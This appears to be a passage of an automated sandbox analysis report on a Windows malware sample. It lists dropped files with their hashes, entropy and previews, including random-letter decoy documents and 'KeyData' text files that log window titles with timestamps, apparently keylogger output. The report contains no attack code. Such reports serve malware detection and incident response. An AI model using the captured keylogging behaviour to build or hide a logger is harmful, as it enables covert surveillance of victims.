NPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\PALRGUCVEH.xlsx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696508269038202
Encrypted:	false
SSDEEP:	24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
MD5:	0E9E92228B27AD7E7B4449467A529B0C
SHA1:	209F92CDFC879EE2B98DEF315CCE166AFEC00331
SHA-256:	284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
SHA-512:	CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
Malicious:	false
Preview:	PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\QFAPOWPAFG.pdf

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690474000177721
Encrypted:	false
SSDEEP:	24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
MD5:	A01E6B89B2F69F2DA25CB28751A6261C
SHA1:	48C11C0BECEB053F3DB16EC43135B20360E77E9B
SHA-256:	0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
SHA-512:	1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
Malicious:	false
Preview:	QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\SNIPGPPREP.docx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701796197804446
Encrypted:	false
SSDEEP:	24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
MD5:	C8350CE91F4E8E8B04269B5F3C6148DA
SHA1:	22D523A327EBAF8616488087E2DCE9DBD857F0CC
SHA-256:	1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
SHA-512:	C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
Malicious:	false
Preview:	SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\Files\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataHMEcskyH.txt

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	792
Entropy (8bit):	4.321165386041125
Encrypted:	false
SSDEEP:	3:tP5n1XKUE4v/5n1XKUE4v/5n1XKUE4v/5n1XKUE4v/qZ2UE4v/qZ2UE4v/qZ2UEm:tBfFfFfFf4444444zzzzzzzCCCCC+dpx
MD5:	85D02F561AE6ECB307591A5DDE52D786
SHA1:	B77EDFA2ABB700D7EE7FCDC9AA8C2B423FDB1DCA
SHA-256:	9369F93FF18665BCFEC66025C66D913547DE5B01063EDB83726901D1DD0A8C87
SHA-512:	B5565A32474B92E3CA38A8A8AD0B77A6CF68DA8250AA723E8ECDC723AD805702F46BAFC4149E7CB595911B20B26B486E731FD93692E04A5157BF4B151FC292DF
Malicious:	false
Preview:	..[08:28:30]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:33]<<Program Manager>>....[08:28:33]<<Program Manager>>....[08:28:33]<<Program Manager>>....[08:28:33]<<Program Manager>>....[08:28:33]<<Program Manager>>....[08:28:39]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataHyaLuYzE.txt

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	4.333705880633283
Encrypted:	false
SSDEEP:	12:t9RRRYYYYYYYnnnnnnnnCpCpCpCpCpCpyyyyyyyVNVNVNVNVNVNVNbZx:tTcccccW
MD5:	21E34CB4FFFAF0B759DFE06E7FD19135
SHA1:	FC68CC7B2BE68A673187E76B4A4CF83A55FDF215
SHA-256:	7A38DD3ECB9565C2E137688D1361741F79929F740BB050E25DD1990FF316DEA5
SHA-512:	7E784EA0462B91835A9DC932E5964D13CCCE868BBAA87E30E71E37DBAD7F70740D630B2FAEB932F0EEFC0EF330396D888B883640CFC134DDD204B0961083A568
Malicious:	false
Preview:	..[08:28:16]<<Program Manager>>....[08:28:16]<<Program Manager>>....[08:28:16]<<Program Manager>>....[08:28:16]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:17]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:18]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:19]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:20]<<Program Manager>>....[08:28:2

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataIZODtrsj.txt

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	429
Entropy (8bit):	4.324843597671395
Encrypted:	false
SSDEEP:	3:tPG1aUE4v/G1aUE4v/VdKUE4v/VdKUE4v/VdKUE4v/VdKUE4v/VdKUE4v/VdKUEf:tO1Zq1ZDpDpDpDpDpDpDpDpIZIZCZNx
MD5:	633D9F2FC303FCFCD6A19CB52BA47284
SHA1:	16E17679D2229DA431DEBECC484AA717C809275D
SHA-256:	746BDFF262368D0D0301E3D5406E52ECC205FFB3E6910769364A123703848EE4
SHA-512:	2F6077A6D2875FB4CC23106DD5AD1D9CBAA8A6A82EAEE87DC589EF867532275C3D31559783696B4F74AB8D80BF68CFF008C8AB3C5A8996E5D2BA59B84EA8422C
Malicious:	false
Preview:	..[08:28:40]<<Program Manager>>....[08:28:40]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:42]<<Program Manager>>....[08:28:42]<<Program Manager>>....[08:28:48]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataKlWubVgv.txt

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.340662761780532
Encrypted:	false
SSDEEP:	3:tPwUE4v/wUE4v/wUE4v/QaUE4v/QaUE4v/QaUE4v/QaUE4v/QaUE4v/QaUE4v/Qk:tvDDSSSSSSSKfx
MD5:	66C7C2337337C9ED8A372485D1429D49
SHA1:	B4322E3928EE39129ACB965CA61548622506FA8E
SHA-256:	7816FA92A64179D29C79C9A6EE9909EA8E8F78D180C860F0E790810FD1499900
SHA-512:	5580BF599044F847DE55C9AE1D3680D154A3DF3A9B08EF21662770805D5C5F18133ECAB620C821A5993646AF7A15E0A7628EB54ED8554ED4AB9AEEDC57F01CCC
Malicious:	false
Preview:	..[08:28:50]<<Program Manager>>....[08:28:50]<<Program Manager>>....[08:28:50]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:51]<<Program Manager>>....[08:28:57]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataLscxvYqK.txt

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4950
Entropy (8bit):	4.43662643879061
Encrypted:	false
SSDEEP:	24:tr33fFFFFFFgffffffGYYYYYYYwmmmmmmmcJJJJJJt4i4i4i4i4i4i4Naaaaaaw:Qbbbbbbs
MD5:	99ED2FE3C0E0A3777681F0FCB159D410
SHA1:	28B8AA37CD0249DAEF4F34BAE16C43B2E47B3F18
SHA-256:	93954D38E7F0BC385C5F883CFEBAB5A50C3FFBA35C6DBEB7A4C2DCADF4009134
SHA-512:	58E4C30D4E672A6CBBCDEF02B83317BE0D134BF15771490A32B60E83E9C6A994B3D09F0CF3E788E4BE0F1308E8D9E7378EEC4E76EAA5F1B0A5CFAF4DA807B6C9
Malicious:	false
Preview:	..[08:27:15]<<Program Manager>>....[08:27:15]<<Program Manager>>....[08:27:15]<<Program Manager>>....[08:27:16]<<Program Manager>>....[08:27:16]<<Program Manager>>....[08:27:16]<<Program Manager>>....[08:27:16]<<Program Manager>>....[08:27:16]<<Program Manager>>....[08:27:16]<<Program Manager>>....[08:27:16]<<Program Manager>>....[08:27:16]<<Program Manager>>....[08:27:17]<<Program Manager>>....[08:27:17]<<Program Manager>>....[08:27:17]<<Program Manager>>....[08:27:17]<<Program Manager>>....[08:27:17]<<Program Manager>>....[08:27:17]<<Program Manager>>....[08:27:17]<<Program Manager>>....[08:27:18]<<Program Manager>>....[08:27:18]<<Program Manager>>....[08:27:18]<<Program Manager>>....[08:27:18]<<Program Manager>>....[08:27:18]<<Program Manager>>....[08:27:18]<<Program Manager>>....[08:27:18]<<Program Manager>>....[08:27:19]<<Program Manager>>....[08:27:19]<<Program Manager>>....[08:27:19]<<Program Manager>>....[08:27:19]<<Program Manager>>....[08:27:19]<<Program Manager>>....[08:27:1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataPIzkdBls.txt

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	792
Entropy (8bit):	4.327461149967812
Encrypted:	false
SSDEEP:	12:tv77FfFfFfFfFfFfFf4444444zzzzzzdfx:tu
MD5:	7E65A6D9FCB4029BCDA374C6B8233C00
SHA1:	DDFC3CAF7AC32B9DA4F14ABE2B67C64B9B2CD5FF
SHA-256:	E49E679EB247FCBAFC4EFD780B7ECA1D867E29AEFC059269024FFDD6E176225F
SHA-512:	A154E9C1B311A9EB818AA5AA48EBD32816257DC502682522C2538ABE1CABDF965A66FD4617EA325614E1F91DE9E6CC27D870696F4CD245A59EEA0AB8CA3305D5
Malicious:	false
Preview:	..[08:28:29]<<Program Manager>>....[08:28:29]<<Program Manager>>....[08:28:29]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:30]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:31]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:32]<<Program Manager>>....[08:28:38]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDataZbCyVRJK.txt

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.320206205524285
Encrypted:	false
SSDEEP:	3:tPeE4v/eE4v/nIUE4v/nIUE4v/nIUE4v/nIUE4v/nIUE4v/nIUE4v/nIUE4v/Yay:tWqDDDDDDDcZJ1Zx
MD5:	1A52EE7ADA79FAB5ADB07C175E72DC1E
SHA1:	19101D018C583F03DF43A93B3AA6F12AA1A3ACE3
SHA-256:	C0B54BAA4E83C66B85FDEED74E43824755ACAE741709F1F4A8E942CA7BFE5B67
SHA-512:	76C0E0966BAF26E4500A9876DCDEA37F4FC5298F36B37B251E5A62224CB2AE243A1EF02397409046DF01A1DB4DA49FBC50B9320283A776EEEF38F5E55287E195
Malicious:	false
Preview:	..[08:28:59]<<Program Manager>>....[08:28:59]<<Program Manager>>....[08:29:00]<<Program Manager>>....[08:29:00]<<Program Manager>>....[08:29:00]<<Program Manager>>....[08:29:00]<<Program Manager>>....[08:29:00]<<Program Manager>>....[08:29:00]<<Program Manager>>....[08:29:00]<<Program Manager>>....[08:29:01]<<Program Manager>>....[08:29:06]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatacpvQgHZL.txt

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.319435515956303
Encrypted:	false
SSDEEP:	3:tPnIUE4v/nIUE4v/nIUE4v/YaUE4v/YaUE4v/YaUE4v/YaUE4v/YaUE4v/YaUE46:tnDDcZcZcZcZcZcZcZbx
MD5:	536E65098FEC3BB2D1A8B494A46C0D2E
SHA1:	07AD4B09417AAC7B7E02EABEF890044CA7CF414D
SHA-256:	23E34294B3DC99060BDC54A9087E81E66ECD5E0A5A87CABD7D50B2B5E8AF7BBB
SHA-512:	394E35789552DB383DEB1A37729E82FC458FBD719840B621B1154BFA55ECAED96F640402A9ABD035ED623A26064285E2565D247E8E39A119229A5E8D4A5D6683
Malicious:	false
Preview:	..[08:29:00]<<Program Manager>>....[08:29:00]<<Program Manager>>....[08:29:00]<<Program Manager>>....[08:29:01]<<Program Manager>>....[08:29:01]<<Program Manager>>....[08:29:01]<<Program Manager>>....[08:29:01]<<Program Manager>>....[08:29:01]<<Program Manager>>....[08:29:01]<<Program Manager>>....[08:29:01]<<Program Manager>>....[08:29:08]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatagoPLtddl.txt

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	396
Entropy (8bit):	4.33460916142866
Encrypted:	false
SSDEEP:	3:tPVdKUE4v/VdKUE4v/VdKUE4v/VdKUE4v/VdKUE4v/VdKUE4v/cXpE4v/cXpE4ve:tHpDpDpDpDpDpIZIZIZIZIZTZx
MD5:	1B35CE62CCA1085250042ECDAE109978
SHA1:	F1930F1E529C62F1A90178146DC037F20FA51E7C
SHA-256:	DFECDB2468B0E2A195EF9AFEC98EEFFAD01F449C8CFE22C6FCC4FCA5D7A5480A
SHA-512:	3D1D37A007E4CDFE35D1B9678FBBBA13E752D115ACB9585E4DFE1276CD23E905CFCB0ED4B20FDE8909DC9CE7CAFF7BA0417BF97BB7E53068EC7FA6C5612C021C
Malicious:	false
Preview:	..[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:41]<<Program Manager>>....[08:28:42]<<Program Manager>>....[08:28:42]<<Program Manager>>....[08:28:42]<<Program Manager>>....[08:28:42]<<Program Manager>>....[08:28:42]<<Program Manager>>....[08:28:49]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatahOOyPCCl.txt

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3366
Entropy (8bit):	4.423245373318018
Encrypted:	false
SSDEEP:	24:t0YYwmmmmmmcJJJJJ44i4i4i4i4i4i4iaaaaj:Kbbbbbb+
MD5:	211981021BC0C3750DDAE6A0EA569B37
SHA1:	0D531E24A40984E926D4EEE7708355B7B99668DB
SHA-256:	E19CFB0C96473EB0EAF19346D9BD5AAFC3482BB4D0A04BD14AF27245426E1F21
SHA-512:	652AAD33D25F186B3DB3767068A48ED1048FE017786C9A7D47058B05CB3D758962DACB3E516BE46B53C682B7B518D008462B5CD2C630807485B9D4E60667CD72
Malicious:	false
Preview:	..[08:27:21]<<Program Manager>>....[08:27:21]<<Program Manager>>....[08:27:21]<<Program Manager>>....[08:27:22]<<Program Manager>>....[08:27:22]<<Program Manager>>....[08:27:22]<<Program Manager>>....[08:27:22]<<Program Manager>>....[08:27:22]<<Program Manager>>....[08:27:22]<<Program Manager>>....[08:27:23]<<Program Manager>>....[08:27:23]<<Program Manager>>....[08:27:23]<<Program Manager>>....[08:27:23]<<Program Manager>>....[08:27:23]<<Program Manager>>....[08:27:23]<<Program Manager>>....[08:27:23]<<Program Manager>>....[08:27:24]<<Program Manager>>....[08:27:24]<<Program Manager>>....[08:27:24]<<Program Manager>>....[08:27:24]<<Program Manager>>....[08:27:24]<<Program Manager>>....[08:27:24]<<Program Manager>>....[08:27:25]<<Program Manager>>....[08:27:25]<<Program Manager>>....[08:27:25]<<Program Manager>>....[08:27:25]<<Program Manager>>....[08:27:39]<<Program Manager>>....[08:27:40]<<Program Manager>>....[08:27:40]<<Program Manager>>....[08:27:40]<<Program Manager>>....[08:27:4

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatamyBMLQGo.txt

Download File

Process:	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.334400432081313
Encrypted:	false
SSDEEP:	3:tPwfE4v/wfE4v/wfE4v/wfE4v/wfE4v/wfE4v/udKUE4v/udKUE4v/udKUE4v/uk:tofcfcfcfcfcfEEEEYNx
MD5:	E82B6B138F015D41D510A4E8F8953DFE
SHA1:	C0E216A16CCBFCE8D00F53C749C7C6C73617D691
SHA-256:	ECC036AF6E6AE9AC0D9889802CF52EEBA4A7CC9FD2AABBED4A633BDDCE07F1B3
SHA-512:	B1B6BA12DC320B4B997A4DA5D00335814851359F44EF632F851CCF3FAD3BC80D026D1A5997D3E8442FD3BE7413D1972EB5EAE9F73959C7CB46E2F32F7BD6ABBE
Malicious:	false
Preview:	..[08:29:09]<<Program Manager>>....[08:29:09]<<Program Manager>>....[08:29:09]<<Program Manager>>....[08:29:09]<<Program Manager>>....[08:29:09]<<Program Manager>>....[08:29:09]<<Program Manager>>....[08:29:10]<<Program Manager>>....[08:29:10]<<Program Manager>>....[08:29:10]<<Program Manager>>....[08:29:10]<<Program Manager>>....[08:29:16]<<Program Manager>>..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\KeyDatapMzAnAuv.txt

Download File

Process:	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	363
Entropy (8bit):	4.316999906434753
Encrypted:	false
SSDEEP:	3:tPQaUE4v/QaUE4v/QaUE4v/QaUE4v/QaUE4v/xfE4v/xfE4v/xfE4v/xfE4v/xf1:teSSSSVfVfVfVfVfbx
